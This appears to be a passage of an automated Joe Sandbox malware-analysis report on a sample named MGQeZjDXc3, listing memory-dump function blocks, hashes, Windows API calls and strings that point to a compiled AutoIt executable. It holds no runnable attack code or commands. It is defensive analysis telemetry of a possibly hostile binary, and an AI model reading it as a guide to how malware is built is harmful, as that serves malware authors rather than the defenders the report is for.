                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 4be0aea3b6e97d9a38076e265d8342491ab959573190113130f5032fe4319962
                                                • Instruction ID: ea1dcaceb52bd6608bee3f6eb54218f662a13774ea47cfaeb812a0e8aeb458de
                                                • Opcode Fuzzy Hash: 4be0aea3b6e97d9a38076e265d8342491ab959573190113130f5032fe4319962
                                                • Instruction Fuzzy Hash: 35A0223000020CFBCF002F82FC088883F2CFB002A0B200020F80C82030CF33A8228ACA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8cdf2b0f816f21c7fc73e5a7d686dbdeb77a06001e7a4ac143b2bcef93f7858
                                                • Instruction ID: 7259cfde4c577570d4c17737f3203841dc3f59210cdb87d64c871b55588791ed
                                                • Opcode Fuzzy Hash: f8cdf2b0f816f21c7fc73e5a7d686dbdeb77a06001e7a4ac143b2bcef93f7858
                                                • Instruction Fuzzy Hash: 03126B70A002099FDF04DFA8DA85AEEB7F5FF49300F504569E806E7291EB36AD64CB54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Exception@8Throwstd::exception::exception
                                                • String ID:
                                                • API String ID: 3728558374-0
                                                • Opcode ID: 64988ee6d90b326b139fa6a08d592a8812654a9ad8d50ba30fd253ad93e2538f
                                                • Instruction ID: dd61aeef911717ccbdcbb27987ba2036f1aa81e607f5e030523aebb7787a41d5
                                                • Opcode Fuzzy Hash: 64988ee6d90b326b139fa6a08d592a8812654a9ad8d50ba30fd253ad93e2538f
                                                • Instruction Fuzzy Hash: EB029070A00205DFCF14DF68D9916AEBBF5EF49300F5480A9E806DB296EB31DE65CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                • Instruction ID: 2b9858b13522ef8dc4b2712e9fabde1c084708e23f049e9a53697bf76f651e13
                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                • Instruction Fuzzy Hash: F3C182322051A34EDF2D47398834D7EBAA55AA2BB131F176DD8B2CB5D6EF20C524D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                • Instruction ID: 57ee4301526ca72378c796b94cf3e09f30b2d64ec846bc861fa84b68899eb5f1
                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                • Instruction Fuzzy Hash: 61C1A2322051934DDF2D4739C834E7EBAA55AA2BB131F076DD4B2DB4D6EF20D524D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: 0b5a67d8ecb3ca55d41ce251c74e981c1cb66a6087f64c7e1a11974ba3df2b72
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: FBC1A1322051934EDF2D473A8C3497EFAA55AA2BB171F076DD4B2CB5DAEF20C524D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 0ca9d149d3574a5d352b14ff126482d9b66b371b8ff979a9365cebf92edc72a2
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: 6AC16F322050930DDF2D4739CC744BEBAA95AA2BB531E177DD8B2CB5DBEE20C564D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction ID: cdfef5e9ff43266bd47aeef0e39a550e5bee39560381fc49322ef26ea7e9368d
                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction Fuzzy Hash: 1741D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D556AB345D730AB41DB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction ID: 5899b7ea3df284be1514f2e6f4c000e0cfd67d0ad5d8c14e458eb04d3750e020
                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction Fuzzy Hash: 2A019278A00109EFCB49DF98C5909AEF7F6FB88314F208599D849E7741D730AE41DB84
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction ID: f07903ed13b77b260dd9049c53193bbc000d9bc39af9626feb5cba48fca17f83
                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction Fuzzy Hash: 5601D278A00109EFCB45DF98C5809AEF7B5FB88310F208199E849E7301D730AE41CB84
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 00AFA2FE
                                                • DeleteObject.GDI32(00000000), ref: 00AFA310
                                                • DestroyWindow.USER32 ref: 00AFA31E
                                                • GetDesktopWindow.USER32 ref: 00AFA338
                                                • GetWindowRect.USER32(00000000), ref: 00AFA33F
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AFA480
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AFA490
                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA4D8
                                                • GetClientRect.USER32(00000000,?), ref: 00AFA4E4
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AFA51E
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA540
                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA553
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA55E
                                                • GlobalLock.KERNEL32(00000000), ref: 00AFA567
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA576
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AFA57F
                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA586
                                                • GlobalFree.KERNEL32(00000000), ref: 00AFA591
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA5A3
                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B2D9BC,00000000), ref: 00AFA5B9
                                                • GlobalFree.KERNEL32(00000000), ref: 00AFA5C9
                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AFA5EF
                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AFA60E
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA630
                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AFA81D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 2211948467-2373415609
                                                • Opcode ID: 9a0dbda593360b8dd50bf2c166646c49de7e62d2f8dfe4adda6dc57bb8326965
                                                • Instruction ID: 1f12a9a5baefc6e85f774a74dc17b82ab871493b75afb3c688e4124676321695
                                                • Opcode Fuzzy Hash: 9a0dbda593360b8dd50bf2c166646c49de7e62d2f8dfe4adda6dc57bb8326965
                                                • Instruction Fuzzy Hash: 2C027075900108EFDB14DFA4CD89EAE7BB9FB49311F148558FA19AB2A0CB74ED41CB60
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 00B0D2DB
                                                • GetSysColorBrush.USER32(0000000F), ref: 00B0D30C
                                                • GetSysColor.USER32(0000000F), ref: 00B0D318
                                                • SetBkColor.GDI32(?,000000FF), ref: 00B0D332
                                                • SelectObject.GDI32(?,00000000), ref: 00B0D341
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0D36C
                                                • GetSysColor.USER32(00000010), ref: 00B0D374
                                                • CreateSolidBrush.GDI32(00000000), ref: 00B0D37B
                                                • FrameRect.USER32(?,?,00000000), ref: 00B0D38A
                                                • DeleteObject.GDI32(00000000), ref: 00B0D391
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00B0D3DC
                                                • FillRect.USER32(?,?,00000000), ref: 00B0D40E
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B0D439
                                                  • Part of subcall function 00B0D575: GetSysColor.USER32(00000012), ref: 00B0D5AE
                                                  • Part of subcall function 00B0D575: SetTextColor.GDI32(?,?), ref: 00B0D5B2
                                                  • Part of subcall function 00B0D575: GetSysColorBrush.USER32(0000000F), ref: 00B0D5C8
                                                  • Part of subcall function 00B0D575: GetSysColor.USER32(0000000F), ref: 00B0D5D3
                                                  • Part of subcall function 00B0D575: GetSysColor.USER32(00000011), ref: 00B0D5F0
                                                  • Part of subcall function 00B0D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0D5FE
                                                  • Part of subcall function 00B0D575: SelectObject.GDI32(?,00000000), ref: 00B0D60F
                                                  • Part of subcall function 00B0D575: SetBkColor.GDI32(?,00000000), ref: 00B0D618
                                                  • Part of subcall function 00B0D575: SelectObject.GDI32(?,?), ref: 00B0D625
                                                  • Part of subcall function 00B0D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00B0D644
                                                  • Part of subcall function 00B0D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0D65B
                                                  • Part of subcall function 00B0D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00B0D670
                                                  • Part of subcall function 00B0D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B0D698
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 3521893082-0
                                                • Opcode ID: 213d7495dafedf5212c9729557c4c519997956919da68d7b5ee9303718748c23
                                                • Instruction ID: ab23e3e481b4c554f6fa04e98623c1b1a31abcec85615433c9e9f6c5e48e0331
                                                • Opcode Fuzzy Hash: 213d7495dafedf5212c9729557c4c519997956919da68d7b5ee9303718748c23
                                                • Instruction Fuzzy Hash: 8E916D72408301BFDB209F64DC48A6BBBE9FF89325F100A19F962A71E0DB75D945CB52
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00AEDBD6
                                                • GetDriveTypeW.KERNEL32(?,00B3DC54,?,\\.\,00B3DC00), ref: 00AEDCC3
                                                • SetErrorMode.KERNEL32(00000000,00B3DC54,?,\\.\,00B3DC00), ref: 00AEDE29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 8601a69ef7ffe0fbe4c290689db06e180fe1f7849149cd0c4cd5dab3f4efe95b
                                                • Instruction ID: 3068650e4a4de2116941bbb4fcca7f6b53fdaa07f353b13a78e7fa99fc90992a
                                                • Opcode Fuzzy Hash: 8601a69ef7ffe0fbe4c290689db06e180fe1f7849149cd0c4cd5dab3f4efe95b
                                                • Instruction Fuzzy Hash: DD51C430248382DBC610DF22CDD1A69B7F1FB95B86B244999F8439B3E1DB70D949DB42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 1ca15d5da8814ab8c2c092806a4a88e64c9549f63105eb11012a1f1ece572355
                                                • Instruction ID: 949f85b8c11c81fb482f17c67b46db50e977134828775926defc373c52368ffc
                                                • Opcode Fuzzy Hash: 1ca15d5da8814ab8c2c092806a4a88e64c9549f63105eb11012a1f1ece572355
                                                • Instruction Fuzzy Hash: B781F831640205BAEB24AF64DE82FFA37B8EF26710F144068F905AB1D3EB61D955C2A1
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00B0C788
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B0C83E
                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B0C859
                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00B0CB15
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: 0
                                                • API String ID: 2326795674-4108050209
                                                • Opcode ID: 21c392357454edd18975520dd6debe4286affc46ccc645a8ff06ef63af3b5957
                                                • Instruction ID: 8a8f618120408b5b64eec4728d340d5792afaa1c907f5e179212e70ea2bd3f8a
                                                • Opcode Fuzzy Hash: 21c392357454edd18975520dd6debe4286affc46ccc645a8ff06ef63af3b5957
                                                • Instruction Fuzzy Hash: 2CF1D171204305AFE7218F28C885BAABFE4FF49354F084BA9F599962E1CB74C845DB91
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,00B3DC00), ref: 00B06449
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 3964851224-45149045
                                                • Opcode ID: d0006e74840704e078d81f52bad3c07434c83c9397a6a22d24e27398e4d9e6aa
                                                • Instruction ID: 34434a17e137edd670fea61b1daca0218e4767e8bfbafe3573ecf47d111c3ada
                                                • Opcode Fuzzy Hash: d0006e74840704e078d81f52bad3c07434c83c9397a6a22d24e27398e4d9e6aa
                                                • Instruction Fuzzy Hash: 98C15D702042458BCB04EF10C691AAE7BE5AF96354F0448D9F8865B3E3DB31ED5ADB92
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 00B0D5AE
                                                • SetTextColor.GDI32(?,?), ref: 00B0D5B2
                                                • GetSysColorBrush.USER32(0000000F), ref: 00B0D5C8
                                                • GetSysColor.USER32(0000000F), ref: 00B0D5D3
                                                • CreateSolidBrush.GDI32(?), ref: 00B0D5D8
                                                • GetSysColor.USER32(00000011), ref: 00B0D5F0
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0D5FE
                                                • SelectObject.GDI32(?,00000000), ref: 00B0D60F
                                                • SetBkColor.GDI32(?,00000000), ref: 00B0D618
                                                • SelectObject.GDI32(?,?), ref: 00B0D625
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0D644
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0D65B
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B0D670
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B0D698
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B0D6BF
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00B0D6DD
                                                • DrawFocusRect.USER32(?,?), ref: 00B0D6E8
                                                • GetSysColor.USER32(00000011), ref: 00B0D6F6
                                                • SetTextColor.GDI32(?,00000000), ref: 00B0D6FE
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B0D712
                                                • SelectObject.GDI32(?,00B0D2A5), ref: 00B0D729
                                                • DeleteObject.GDI32(?), ref: 00B0D734
                                                • SelectObject.GDI32(?,?), ref: 00B0D73A
                                                • DeleteObject.GDI32(?), ref: 00B0D73F
                                                • SetTextColor.GDI32(?,?), ref: 00B0D745
                                                • SetBkColor.GDI32(?,?), ref: 00B0D74F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
